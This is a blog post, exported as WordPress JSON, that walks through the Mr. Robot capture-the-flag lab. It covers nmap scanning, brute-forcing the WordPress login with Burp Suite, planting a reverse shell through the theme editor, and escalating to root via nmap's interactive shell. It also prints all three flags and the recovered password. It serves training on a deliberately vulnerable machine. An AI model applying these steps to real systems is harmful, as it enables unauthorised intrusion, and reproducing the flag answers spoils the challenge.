{"id":9952,"date":"2023-03-11T17:06:35","date_gmt":"2023-03-11T11:36:35","guid":{"rendered":"https:\/\/reconcybersecurity.com\/?p=9952"},"modified":"2023-04-27T13:33:00","modified_gmt":"2023-04-27T13:33:00","slug":"master-the-art-of-hacking-with-ctf-mr-robot-a-step-by-step-walkthrough-recon-cyber-security-cyber-security","status":"publish","type":"post","link":"https:\/\/reconcybersecurity.com\/blogs\/master-the-art-of-hacking-with-ctf-mr-robot-a-step-by-step-walkthrough-recon-cyber-security-cyber-security\/","title":{"rendered":"Master the Art of Hacking with CTF Mr. Robot: A Step-by-Step Walkthrough | CYBER SECURITY"},"content":{"rendered":"\n
\n

Introduction<\/p>\n<\/blockquote>\n\n\n\n

Participants of the Mr. Robot CTF must prove their expertise in penetration testing<\/mark><\/strong><\/a> by successfully infiltrating a virtual machine and attaining root access. Featuring multiple levels of complexity, this challenge is designed to emulate the cyber security aspects depicted in the popular television series, Mr. Robot.<\/p>\n\n\n\n

\n

Understanding the Challenge<\/strong><\/p>\n<\/blockquote>\n\n\n\n

Mr. Robot CTF<\/mark><\/strong><\/a> is a vulnerable virtual machine created with security vulnerabilities purposely implemented for exploitation. Its purpose is to find and exploit these weaknesses for full root access. Divided into multiple levels, each requiring distinct aptitudes and resources to surpass, this challenge offers an intriguing and difficult set of objectives.<\/p>\n\n\n\n

To kick off the Mr. Robot CTF, downloading the corresponding virtual machine and importing it into your virtualization software, like VirtualBox<\/mark><\/strong><\/a> or VMware<\/mark><\/strong><\/a>, is essential. Both TryHackMe<\/mark><\/strong><\/a> and vulnhub<\/mark><\/strong><\/a> platforms are accessible to acquire the virtual machine.<\/p>\n\n\n\n

\n

STEPS >><\/p>\n<\/blockquote>\n\n\n\n

We are embarking on the challenge of playing Mr. ROBOT:1 CTF, which requires us to locate the IP address.<\/p>\n\n\n\n

sudo nmap -v -sV 192.168.1.*<\/code><\/pre>\n\n\n\n
\"\"<\/figure>\n\n\n\n
Examining ports 80\/TCP<\/em> and 443\/TCP<\/em>, it is apparent they are open.<\/p>\n\n\n\n
Let’s investigate further.<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
We are now conducting an Aggressive scan on the IP address 192.168.1.17<\/strong><\/em>.<\/p>\n\n\n\n
sudo nmap -A -v 192.168.1.17<\/code><\/pre>\n\n\n\n
\"\"<\/figure>\n\n\n\n
Ensure that the robots.txt<\/strong> file is checked.<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
Now that we are aware of the three keys<\/p>\n\n\n\n
let us locate them.<\/p>\n\n\n\n
To obtain the first key of three, we need to access the file key-1-of-3.txt.<\/strong><\/p>\n\n\n\n
“073403c8a58a1f80d943455fb30724b9”<\/em><\/strong><\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
Using Dirbuster<\/em>, it is possible to filter results.<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
After downloading the txt file found on http:\/\/192.168.1.17\/fsocity.dic<\/mark><\/a>. Let us begin the process of counting the words within.<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
There is an excessive amount of text that needs to be narrowed down.<\/p>\n\n\n\n
cat fsocity.dic<\/strong>|<\/strong>sort|<\/strong>uniq><\/strong>fs.txt<\/code><\/pre>\n\n\n\n
\"\"<\/figure>\n\n\n\n
We are now accessing the wp-admin<\/em> page via dirb<\/strong>.<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
Utilizing the brute-force method with Burp Suite, I tested different login and password combinations by importing them from an fs.txt file<\/em><\/strong>.<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
Go to the appearance section, add the reverse shell code, then hit update.<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
Activate the shell immediately.<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
And on the Intently listening,<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
We have now gained access to the system.<\/p>\n\n\n\n
python -c \"import pty;pty.spawn('\/bin\/bash')\"<\/code><\/pre>\n\n\n\n
\"\"<\/figure>\n\n\n\n
With the given commands, you are now able to …<\/p>\n\n\n\n
ls\n\ncd home\n\nls\n\ncd robot\n\nls\n\nls -ls<\/code><\/pre>\n\n\n\n
\"\"<\/figure>\n\n\n\n
To access the file, it is now ready for use.<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
Afterward, ensure the hash is verified.<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
The password belonging to the user “robot” is \u201cabcdefghijklmnopqrstuvwxyz\u201d<\/em><\/strong><\/p>\n\n\n\n
Transform the user experience by modifying the system.<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
To move forward, utilize this command.<\/p>\n\n\n\n
ls\ncat key-2-of-3.txt\n<\/code><\/pre>\n\n\n\n
This is the second key to success. \u201c822c73956184f694993bede3eb39f959<\/em><\/strong>\u201d<\/p>\n\n\n\n
Now, examine Nmap<\/strong> and employ this command.<\/p>\n\n\n\n
Cd ..\/..\/\n\nWhich nmap\n\nNmap \u2013help\n\nNmap \u2013interactive\n\n!sh\n<\/code><\/pre>\n\n\n\n
\"\"<\/figure>\n\n\n\n
At this juncture, we have accessed the root; therefore, let us use this command.<\/p>\n\n\n\n
Ls\nCd root\nLs\nCat key-3-of-3.txt\n<\/code><\/pre>\n\n\n\n
\"\"<\/figure>\n\n\n\n
The third key is present here. \u201c04787ddef27c3dee1ee161b21670b4e4<\/em><\/strong>\u201d<\/p>\n\n\n\n
Congratulations!<\/em><\/strong> Your machine has solved the problem.<\/p>\n","protected":false},"excerpt":{"rendered":"Introduction Participants of the Mr. Robot CTF must prove their expertise in penetration testing by successfully infiltrating a…\n","protected":false},"author":1,"featured_media":10682,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[241,143,10,55,92],"tags":[240,277,286,278,90,706,707,708,709,710,711,712,713,714,715,716,717,718,719,720,311,721,722,723,724,725,726,727],"class_list":{"0":"post-9952","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-it-knowledge","8":"category-defend-the-web","9":"category-hacking","10":"category-hacking-tools","11":"category-metasploit","12":"tag-cyber-security","13":"tag-ethical-hacking","14":"tag-hacker","15":"tag-hacking","16":"tag-how-to-use-metasploit","17":"tag-mr-robot-admin-panel","18":"tag-mr-robot-ctf-tryhackme","19":"tag-mr-robot-ctf-answers","20":"tag-mr-robot-ctf-fun-facts","21":"tag-mr-robot-ctf-report","22":"tag-mr-robot-ctf-scene","23":"tag-mr-robot-ctf-solution","24":"tag-mr-robot-ctf-tryhackme-answers","25":"tag-mr-robot-ctf-tryhackme-writeup","26":"tag-mr-robot-ctf-vulnhub","27":"tag-mr-robot-ctf-walkthrough","28":"tag-mr-robot-ctf-writeup","29":"tag-mr-robot-username-and-password","30":"tag-mr-robot-walkthrough-vulnhub","31":"tag-mr-robot-ctf-walkthrough-2021","32":"tag-recon-cyber-security","33":"tag-shockz-offsec-mr-robot-ctf-walkthrough-2021","34":"tag-tryhackme-mr-robot","35":"tag-tryhackme-mr-robot-ctf-aldeid","36":"tag-what-is-key-2-mr-robot","37":"tag-what-is-mr-robot-ctf","38":"tag-what-is-the-default-password-for-vulnhub-mr-robot","39":"tag-what-tools-were-used-in-mr-robot"},"_links":{"self":[{"href":"https:\/\/reconcybersecurity.com\/blogs\/wp-json\/wp\/v2\/posts\/9952","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reconcybersecurity.com\/blogs\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reconcybersecurity.com\/blogs\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reconcybersecurity.com\/blogs\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/reconcybersecurity.com\/blogs\/wp-json\/wp\/v2\/comments?post=9952"}],"version-history":[{"count":2,"href":"https:\/\/reconcybersecurity.com\/blogs\/wp-json\/wp\/v2\/posts\/9952\/revisions"}],"predecessor-version":[{"id":11114,"href":"https:\/\/reconcybersecurity.com\/blogs\/wp-json\/wp\/v2\/posts\/9952\/revisions\/11114"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reconcybersecurity.com\/blogs\/wp-json\/wp\/v2\/media\/10682"}],"wp:attachment":[{"href":"https:\/\/reconcybersecurity.com\/blogs\/wp-json\/wp\/v2\/media?parent=9952"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reconcybersecurity.com\/blogs\/wp-json\/wp\/v2\/categories?post=9952"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reconcybersecurity.com\/blogs\/wp-json\/wp\/v2\/tags?post=9952"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}